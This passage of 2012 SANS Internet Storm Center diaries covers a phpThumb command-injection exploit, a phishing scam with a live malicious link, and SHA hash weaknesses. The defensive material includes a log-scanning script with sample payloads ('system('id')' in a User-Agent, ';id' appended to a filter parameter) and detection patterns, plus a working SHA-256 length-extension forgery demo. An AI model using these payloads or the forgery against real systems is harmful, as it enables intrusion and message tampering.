Now here comes the interesting part: The "User Agent" is actually not used by phpThumb. Instead, the actual exploit happens in the POST data (which is why you are still seeing the POST method used). However, the POST data is somewhat validated, not allowing it to contain the full exploit script. Instead, the function executed via the "POST" data will refer to the HTTP_USER_AGENT environment variable, pull its content and execute it. Some of the other discussions of this bug miss this important aspect of the exploit.

Here is a quick outline of the code, and what went wrong:

First of all, the "fltr" parameter is parsed. Multiple filters may be provided, but for the purpose of this exploit, one is all it takes. Each filter contains a command, and a parameter. They are delimited by a pipe ("|").

@list($command, $parameter) = explode('|', $filtercommand, 2);

Later, the command line is assembled, without any additional checks on the parameter. For example:

$commandline .= ' -modulate 100,'.(100 - $parameter).',100';

Finally, the command line is executed:

$IMresult = phpthumb_functions::SafeExec($commandline);

Don't get your hopes up based on the name of the function ("SafeExec"). Its main purpose is to figure out which one of the various ways of code execution is allowed.

The only hurdle the attacker has to overcome is to create an exploit that will first run the ImageMagick command successfully, then append the malicious command with a semicolon. The semicolon is never filtered. Many of these exploits don't even bother with the additional user agent obfuscation. The "googlebot" part of the header is likely only included to sneak past weak web application firewall configurations that may ignore traffic from Google (the IP address this exploit came from is not associated with Google).
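As an added example serving both the "Blog Log" diary above and this one (not the diaries' or the blog engine's own code), the script below parses constructed Apache combined-format lines, flags repeated login POSTs, comment-spam bursts, PHP code in the User-Agent or Referer header, and shell metacharacters in a phpThumb "fltr" parameter, and renders the result as an .htaccess deny list. The login and comment URLs, the thresholds and the log lines are assumptions; note that POST bodies never reach the access log, so for the phpThumb case the header is usually the only trace.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Apache "combined" log format (mod_log_config): host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

LOGIN_PATH = "/wp-login.php"            # assumed login URL of the blog engine
COMMENT_PATH = "/wp-comments-post.php"  # assumed comment submission URL
GUESS_LIMIT = 5                         # login POSTs from one IP before it counts as password guessing
SPAM_LIMIT = 3                          # comment POSTs from one IP before it counts as spam
# Strings that mark code smuggled into a header (the phpThumb user agent above starts with "<!--?")
CODE_MARKERS = ("<!--?", "<?php", "system(", "exec(", "passthru(", "shell_exec(")

# Constructed sample lines, not real traffic: a login guesser, a comment spammer, a phpThumb probe, a crawler
SAMPLE_LOG = "\n".join(
    ['203.0.113.5 - - [05/Apr/2012:10:01:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"' % s for s in range(6)]
    + ['198.51.100.9 - - [05/Apr/2012:10:02:%02d +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://cheap.example/" "Mozilla/4.0"' % s for s in range(3)]
    + ['198.51.100.7 - - [05/Apr/2012:10:03:00 +0000] "POST /phpThumb.php?src=x.jpg&fltr[]=blur|9;id HTTP/1.1" 200 512 "-" "<!--?system(\'id\');?-->Googlebot/2.1 (+http://www.google.com/bot.html)"',
       '192.0.2.44 - - [05/Apr/2012:10:04:00 +0000] "GET /2012/04/post/ HTTP/1.1" 200 8831 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"'])

def parse(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None    # None for lines that are not combined format

def looks_like_code(value):
    return any(marker in value for marker in CODE_MARKERS)

def query_values(target, prefix):
    """Decoded values of every query parameter whose name starts with prefix (fltr, fltr[], ...)."""
    out = []
    for part in urlsplit(target).query.split("&"):
        key, _, value = part.partition("=")
        if key.startswith(prefix):
            out.append(unquote(value))
    return out

def suspicious_filter(target):
    """True if a phpThumb fltr value carries shell metacharacters after the 'command|parameter' split."""
    for value in query_values(target, "fltr"):
        _command, _, parameter = value.partition("|")
        if any(ch in parameter for ch in ";|&`$"):
            return True
    return False

def classify(log_text):
    """Map each offending IP to the set of reasons it was flagged."""
    login_posts, comment_posts, reasons = Counter(), Counter(), defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        if rec["method"] == "POST" and path == LOGIN_PATH:
            login_posts[rec["ip"]] += 1
        elif rec["method"] == "POST" and path == COMMENT_PATH:
            comment_posts[rec["ip"]] += 1
        if looks_like_code(rec["ua"]) or looks_like_code(rec["referer"]):
            reasons[rec["ip"]].add("code in header")
        if suspicious_filter(rec["target"]):
            reasons[rec["ip"]].add("shell metacharacters in fltr")
    for counter, limit, label in ((login_posts, GUESS_LIMIT, "password guessing"), (comment_posts, SPAM_LIMIT, "comment spam")):
        for ip, n in counter.items():
            if n >= limit:
                reasons[ip].add(label)
    return dict(reasons)

def htaccess_block(reasons):
    """Render an Apache 2.2 style .htaccess deny list (comments must sit on their own line)."""
    lines = ["Order Allow,Deny", "Allow from all"]
    for ip, why in sorted(reasons.items()):
        lines += ["# " + ", ".join(sorted(why)), "Deny from " + ip]
    return "\n".join(lines)
```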

[1] http://resources.infosecinstitute.com/sql-injection-http-headers/
[2] http://blog.spiderlabs.com/2011/12/honeypot-alert-user-agent-field-arbitrary-php-code-execution.html
[3] http://phpthumb.sourceforge.net/demo/docs/phpthumb.changelog.txt

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-04

ISC Feature of the Week: Diary/Infocon/Event Notifications


We briefly noted this topic in https://isc.sans.edu/diary/ISC+Feature+of+the+Week+XML+Feeds/12595. If you are already signed up, you saw the recent infocon change to Yellow delivered directly to you! If you aren't signed up and don't want to miss the next one or any of our diaries published, read on! You can setup notifications at https://isc.sans.edu/notify.html.


Overview - https://isc.sans.edu/overview

  • A typical notification will include all content as part of the subject, and a link to the relevant content in the body.
  • Selection from drop-down will include infocon change notification by default.
  • To change your subscription option, just sign up again and the new signup will replace the old one.

Subscribe - https://isc.sans.edu/notify.html#subscribe

  • To get started, fill in the form and click Subscribe to receive a validation email.
  • Notification types are defined below.
  • Your email can be any email address, including the one your cellular provider assigns to your phone. Contact your provider if you need more information on this. If you are logged in to ISC, your email will be entered for you.
  • Approximate time of day is for daily summary email. Adjust UTC time for your timezone.

Unsubscribe - https://isc.sans.edu/notify.html#unsubscribe

  • Simply enter your email in the box and click Unsubscribe. If you are logged in to ISC, it will be entered for you. You will see the option to unsubscribe in every notification email.

Notification Details - https://isc.sans.edu/notify.html#notification_details

  • New version of a story is published: A handler may mark an update to a story as a new version if it contains a significant addition or correction (more than a spelling correction).
  • New Story is published: Typically, at least one story is published each day.
  • Once a day headlines: We will send you a list of new stories published in the last 24 hours.
  • Infocon Change: You will receive an email whenever the infocon changes. This happens a couple times a year. You will also receive these e-mails if you sign up for any of the other options. The "Important Story" option has been moved into this category.

Sample E-Mail

  • The Subject will always start with [ISC] followed by title such as MacOS X Java Patches.
  • An X-Header, sans-isc-diary, is added.
  • The notification email will be from bounces@isc.sans.org.
  • The body will contain a link to the story or stories, e.g. http://isc.sans.org/diary.html?storyid=672
  • An unsubscribe link is included in every notification http://isc.sans.edu/notify.html#unsubscribe


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu



Published: 2012-04-03

MacOS Users vulnerable to Blackhole exploit kit

If you own a MacOS computer, you might want to disable Java for a while until Oracle develops a patch for the CVE-2012-0507 vulnerability, because there is a Blackhole Exploit Kit version in the wild exploiting this vulnerability, and it can also be exploited using Metasploit.

If you want to disable Java plugins on your MacOS computer, Marcus J. Carey created a video showing how to do it.

More information about this issue at https://www.f-secure.com/weblog/archives/00002341.html

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail:msantand at isc dot sans dot org


Published: 2012-04-03

Another airline scam! This time from US Airways

Be careful with the links shown in this diary because they might still be live and could infect your computer if not handled properly.

More and more scams are seen each day. I discussed in a previous diary a phishing attack sent to users so attackers can own their computers. I will show you today another attack using the same technique and the same malicious code.

I received today the following message:

[Image: US Airways scam email]

The online reservation details link pointed to http://somostigreros.com.ve/s3JgEpEu/index.html. The document has JavaScript pointing to four different URLs:

[Image: JavaScript from the infected page]

The JavaScript downloaded is the same in all four cases and points to another link:

[Image: link to the malicious code]

We arrive at an obfuscated JavaScript. Let's see a snippet of it:

[Image: obfuscated JavaScript]

After decoding the script, I got the same JavaScript analyzed in my previous diary, which performs the following:

  • Identification of the browser being run.
  • Identification of Adobe Flash and Adobe Reader version.
  • Shellcode execution to download malware but this time it is downloaded from
  • Malware is the same DLL discussed in my previous diary, but this time VirusTotal shows a 30/42 detection ratio. McAfee detects it as Generic.bfr!em, Symantec detects it as Suspicious.Cloud and TrendMicro detects it as TROJ_SPNR.11C912.

In addition to the measures previously discussed to mitigate this kind of threat, remember that you can be a propagation vector for malware like the one shown here if you publish vulnerable servers to the Internet. Many attackers no longer want to shut down your server; they want to publish malware in hidden locations inside your web server or web application. Please keep in mind the following:

  • Install all available patches to your operating system and base software. If you cannot do this because your application will stop working, you definitely need to put in place additional controls like a Host Intrusion Prevention System (HIPS) and a Network Intrusion Prevention System (NIPS).
  • Test your web applications for vulnerabilities before publishing them on the Internet. If you don't do this, the attackers will be happy to do it for you.
  • If you are unsure whether your web server or web application has vulnerabilities, use a Web Application Firewall (WAF). I have found ModSecurity useful for that kind of protection.

Have you received this kind of threat inside your network? Let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail:msantand at isc dot sans dot org


Published: 2012-04-02

SHA 1-2-3

NIST is currently in the final stages of defining a new "secure hashing algorithm" (SHA) [1]. The goal of the competition is to find a replacement for the current standard ("SHA-2", aka SHA-256 and SHA-512). NIST attempts to be somewhat proactive in defining crypto standards, realizing that new standards need to be implemented well before the old ones are considered broken.

The three popular hash functions, MD5, SHA1 and SHA2, all use variations of a particular hashing algorithm known as "Merkle-Damgård Construction". Attacks have been developed for MD5 and SHA1, and it is plausible that they will be extended to SHA2 in the future. As a result, the candidates for SHA-3 use different algorithms that are hopefully safe from similar attacks.

A good cryptographic hash will make it hard to come up with two different documents that exhibit the same hash. There are a number of variations of this attack, depending for example on whether or not one of the documents (or hashes) is given. One attack in particular affects the Merkle-Damgård based hashes: the "length extension attack". This attack is particularly relevant if a hash is used to verify the integrity of a document.

In this scenario, the hash is created by concatenating a secret and a file, then hashing the result. The hash and the file (without the secret) are then transmitted to a recipient. The recipient uses the same secret to recreate the hash and to verify that the file is authentic. However, for hash functions susceptible to the length extension attack, an attacker may calculate a valid new hash if the attacker knows the size of the original hashed document. The attacker can only add to the document, though.

To make this more specific, let's say I am sending you a contract. We agreed on a pre-shared secret. I create the hash of "secret+contract" and send the hash to you with the document. An attacker now intercepts the message, adds a page to the contract, and calculates a new hash. All the attacker needs to know (guess?) is the length of the secret.

Current hashing functions can be used safely to authenticate messages, but the algorithm has to be slightly more complex. Instead of just prepending the key, an HMAC algorithm has to be used, which essentially applies the key to the message by XOR'ing the message with the key before hashing (just use HMAC; it's a bit more complex than that and has to be done right).

But back to SHA-3: NIST has narrowed the field of potential candidates down to 5. All of them are safe with respect to the length-extension attack. However, they all take up more CPU cycles than SHA-2, except in some cases where HMAC is required. In addition, at a recent IETF conference [2], it was pointed out that during the competition, SHA-2 turned out to be more robust than expected, reducing the need for SHA-3 to replace SHA-2.

So why should you care? There are a number of reasons why you should be concerned about encryption standards. First of all, many compliance regimes require the use of specific hashing and encryption algorithms. Secondly, while there may be equivalently strong algorithms, developers of libraries usually spend more effort optimizing standard algorithms, and you may even find them "in silicon" in modern CPUs. I wouldn't be surprised to find a "SHA-3" opcode in a future mainstream CPU. At this point, SHA-256 or SHA-512 should be used if you are developing new software. However, if you find SHA-1, you shouldn't panic. Make sure you are using HMAC properly, and are not just concatenating secrets with documents in order to validate them.
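As an added example (not from the diary), the contract scenario above carried through in Python: a compact SHA-256 that can resume from a known chaining state shows why a tag of SHA256(secret || contract) lets an interceptor who knows only the secret's length append a page and still pass the recipient's check, while an HMAC tag over the same message does not. The secret, contract and addendum are constructed values.

```python
import hashlib, hmac, math, struct

# Minimal SHA-256 whose chaining state and absorbed length the caller may set. Round constants and
# initial state are the fractional bits of the cube/square roots of the first primes (computed exactly).
def _primes(n):
    ps, c = [], 2
    while len(ps) < n:
        if all(c % p for p in ps):
            ps.append(c)
        c += 1
    return ps

def _icbrt(n):  # exact integer cube root (Newton's method, starting above the root)
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y

M32 = 0xFFFFFFFF
K = [_icbrt(p << 96) & M32 for p in _primes(64)]
H0 = tuple(math.isqrt(p << 64) & M32 for p in _primes(8))

def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & M32

def md_padding(total_len):
    """Merkle-Damgard padding for a message of total_len bytes: 0x80, zeros, 64-bit bit length."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)

def sha256(data, state=H0, prior_len=0):
    """SHA-256 of data; state/prior_len resume hashing as if prior_len bytes were already absorbed."""
    data += md_padding(prior_len + len(data))
    h = list(state)
    for off in range(0, len(data), 64):
        w = list(struct.unpack(">16L", data[off:off + 64]))
        for i in range(16, 64):
            s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
            s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
            w.append((w[i - 16] + s0 + w[i - 7] + s1) & M32)
        a, b, c, d, e, f, g, hh = h
        for i in range(64):
            t1 = (hh + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)) + ((e & f) ^ (~e & g)) + K[i] + w[i]) & M32
            t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)) + ((a & b) ^ (a & c) ^ (b & c))) & M32
            a, b, c, d, e, f, g, hh = (t1 + t2) & M32, a, b, c, (d + t1) & M32, e, f, g
        h = [(x + y) & M32 for x, y in zip(h, (a, b, c, d, e, f, g, hh))]
    return struct.pack(">8L", *h)

# The diary's scenario: tag = SHA256(secret || contract); the secret itself is never sent.
SECRET = b"pre-shared-secret"                   # constructed for the demo
CONTRACT = b"Pay 1000 USD on delivery."
ADDED_PAGE = b"\nAddendum: pay a further 9000 USD."

def naive_tag(secret, message): return hashlib.sha256(secret + message).digest()
def hmac_tag(secret, message): return hmac.new(secret, message, hashlib.sha256).digest()

def extend(tag, secret_len, message, extra):
    """From SHA256(secret||message) and the secret's length alone, a valid naive tag for message||glue||extra."""
    glue = md_padding(secret_len + len(message))       # the padding the original hash consumed internally
    resumed = struct.unpack(">8L", tag)                 # the tag *is* the chaining state after that block
    return message + glue + extra, sha256(extra, resumed, secret_len + len(message) + len(glue))

def demo():
    forged_msg, forged_tag = extend(naive_tag(SECRET, CONTRACT), len(SECRET), CONTRACT, ADDED_PAGE)
    return {
        "impl_matches_stdlib": sha256(b"abc") == hashlib.sha256(b"abc").digest(),
        "naive_accepts_forgery": hmac.compare_digest(naive_tag(SECRET, forged_msg), forged_tag),
        "hmac_accepts_forgery": hmac.compare_digest(hmac_tag(SECRET, forged_msg), forged_tag),
    }
```

The forged message carries the original padding bytes as "glue" between the contract and the addendum, which is why this only lets the interceptor append, never alter, the original text.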

[1] http://csrc.nist.gov/groups/ST/hash/sha-3/index.html
[2] http://www.ietf.org/proceedings/83/slides/slides-83-saag-0.ppt

Johannes B. Ullrich, Ph.D.
SANS Technology Institute